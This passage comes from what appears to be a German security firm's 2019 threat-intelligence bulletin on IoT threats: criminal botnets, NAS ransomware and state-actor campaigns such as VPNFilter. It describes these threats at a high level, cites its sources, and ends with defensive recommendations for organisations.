perform calculations necessary for cryptocurrency. These botnets are usually very widely
distributed and target a range of different devices. The second botnet requires more
management but can also be more lucrative and focused. Research by TrendMicro has
revealed that criminals are marketing different botnets based on specific devices and their
capacities to deliver. The most popular devices targeted are by far home and small business
routers, which are continuously targeted by new vulnerabilities or the brute forcing
password method.47

An interesting observation from the cybercriminal underground is the development of IoT

botnet focuses. In general, these botnets are being build-managed and expanded by people
who were previously active in creating botnets, not a new generation of criminals joining the
market. Thus, the criminal activity has simply moved to the more easily exploitable resource
that is available. However, in the wake of these changes, malware development has become
much more open and versatile, as the Mira botnet variants are proving. For this botnet,
many different groups and developers contributed to modules of the original malware or
created their own spin-off that would be able to mine cryptocurrency.48

In general, there are several major trends that can be highlighted from observation and
actual analysis of cybercriminal underground conversations that were documented:

 There is a general move towards the development of specific malware for different
subset of IoT devices, and therefore different monetization models that go with this
specialization. This means that clients should expect targeted attacks against their IoT
device subsets with accompanying threats (such as IP camera takeover and demands
for ransom money).
 Criminals are keenly aware that the development of smart factories and production
facilities will require a greater connectivity with the wider internet. Criminals are
already discussing the possibility of holding these devices ransom and disrupting
operations if they feel they are not compensated for their services.

47
Shaun Mirani, Joshua Meyer, Rick Ramgattie and Ian Sindermann, “SOHOpelessly Broken 2.0,” September 16,
2019, ISE, https://www.securityevaluators.com/whitepaper/sohopelessly-broken-2/.
48
Stephen Hilt, Vladimir Kropotov, Fernando Mercês, Mayra Rosario, and David Sancho, “The Internet of Things
in the Cybercrime Underground,” September 10, 2019, TrendMicro Research,
https://documents.trendmicro.com/assets/white_papers/wp-the-internet-of-things-in-the-cybercrime-
underground.pdf.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 15
 Volume 2, Issue 37 TLP Green

 There will be a greater variety of toolkits to fit the expected move towards 5G, which
is expected to add anything from cars to lawn mowers to the IoT landscape. These
rootkits will be more and more focused on a two-stage approach. If the random
password-entering mechanisms fail, a second stage within the toolkit will attempt
common vulnerabilities.

These developments are all very troubling, but the most important development is the idea
of targeting the smart factory and smart home appliances for ransom. One of the IoT threats
has already gone in that direction: As NAS home appliances are targeted with ransomware,
which is quite easy to deliver, DCSO has observed several compromised NAS servers that
were encrypted containing possible relevant work documents of individuals or companies. 49
While this general approach requires a substantial amount of effort and also exposure, it is
exponentially more lucrative and will be performed by organized groups. Russian-speaking
forums and Brazilian forums in particular appear to be focusing on these types of threats.

State Actors

While the discussion about vulnerabilities in IoT devices has focused on cybercriminal actors
and is usually dominated by headlines of the large botnets or a fast-spreading infection
mechanism, state actors have recognized the IoT landscape as an interesting attack vector as
well. Two important examples of this behavior come from Russian groups, which have
created their own fast-growing botnet and also managed to compromise a corporate IT
network with devices set at the perimeter that were easily compromised by a combination
of default passwords and known vulnerabilities.

A major difference between the state-sponsored attacks and the cybercriminal activity
remains the discriminate targeting. While the VPNFilter malware appeared to be relatively
indiscriminate at first, it was essentially designed to detect, filter, and steal information
regarding SCADA systems. Additionally, the malware also attempted to harvest credentials
that were transferred over the router for possible later usage in targeted campaigns.
Explicitly, the malware was also designed to remove competing malware and backdoors
from the infected router in order to not be discovered, and it had capabilities to survive
superficial removal attempts.50

While the targeting is one specific indicator, as shown by the case in which Microsoft
demonstrated that only four devices in total were infected for a successful corporate
network compromise, more sophisticated technical malware is another.51

49
Time Berghoff, “Ransomware: Botnetz-Angriff gegen NAS-Systeme,“ July 27, 2019, GData,
https://www.gdata.de/blog/2019/07/35191-botnetz-angriff-gegen-nas-systeme.
50
Dan Goodin, "VPNFilter malware infecting 500,000 devices is worse than we thought,” June 6, 2019,
ArsTechnica, https://arstechnica.com/information-technology/2018/06/vpnfilter-malware-infecting-50000-
devices-is-worse-than-we-thought/.
51
“Corporate IoT – a path to intrusion,” August 8, 2019, Microsoft Security Response Center, https://msrc-
blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 16
 Volume 2, Issue 37 TLP Green

Future trends based on the research about VPNFilter and network compromises point
towards the following developments in state-sponsored attacks:

 The increased attack surface and the slow but steady move of critical infrastructure
devices online (even if they are only cars or smart meters) makes IoT a lucrative
target for state-sponsored attackers.52
 IoT devices are also often deployed at the perimeter of organizations, especially for
subsidiaries or individuals working in sales, office presence on the ground, and other
more regional representations. This gives state-sponsored attackers another attack
vector into the wider company network for a supply chain compromise.
 IoT devices sometimes carry highly sensitive information and are easy to hijack,
making them an ideal way for attackers to compromise individuals and use their
access to attack the companies or institutions for which these people work.

4.3 DCSO Conclusions and Recommendations

Fundamentally, two different problems shape the IoT threat landscape. The first is the
inability of manufacturers and producers to properly secure devices and patch them
regularly. Basically, this amounts to a systems security flaw that most casual users of IoT
devices cannot address on their own. The second problem comes from the potential of IoT
devices. Their projected ubiquity and reach make them a much more lucrative target for
state-sponsored attackers as well as criminals.53 Managing the potential risks of IoT
compromise will require a substantial amount of effort and time.

DCSO recommendations are as follows:

 Establish and revisit policies on IoT devices, if you have not already done so. Clearly
define rules and responsibilities as well as positions on the perimeter when it comes
to IoT devices, especially those that employees might bring to work or work from
home with IoT devices.
 For smart meters, SCADA systems, or building management applications, there
should be a clear and more controlled environment than for other IoT devices. There
should also be a clear strategy in place for how to regularly patch and surveil these
systems.
 If possible, only rely on products from providers that have worked together with
relevant state and international standard authorities that have implemented the
changes demanded by security experts and researchers.

52
Danny, Palmer, “Cybersecurity: These are the Internet of Things devices that are most targeted by hackers,”
June 12, 2019, ZDNet, https://www.zdnet.com/article/cybersecurity-these-are-the-internet-of-things-devices-
that-are-most-targeted-by-hackers/.
53
Charlie Osborne, “Popular consumer and enterprise routers, IoT devices contain remote access
vulnerabilities,” September 16, 2019, ZDNet, https://www.zdnet.com/article/iot-security-has-become-worse-
in-the-last-five-years/.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 17